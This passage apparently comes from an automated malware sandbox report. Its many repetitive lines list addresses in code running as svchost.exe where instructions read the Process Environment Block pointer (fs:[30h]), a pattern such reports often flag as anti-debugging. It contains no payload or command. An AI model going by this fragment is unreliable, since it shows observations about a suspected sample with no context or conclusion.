            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A062D6 mov eax, dword ptr fs:[00000030h]1_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0625D mov eax, dword ptr fs:[00000030h]1_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039280A0 mov eax, dword ptr fs:[00000030h]1_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
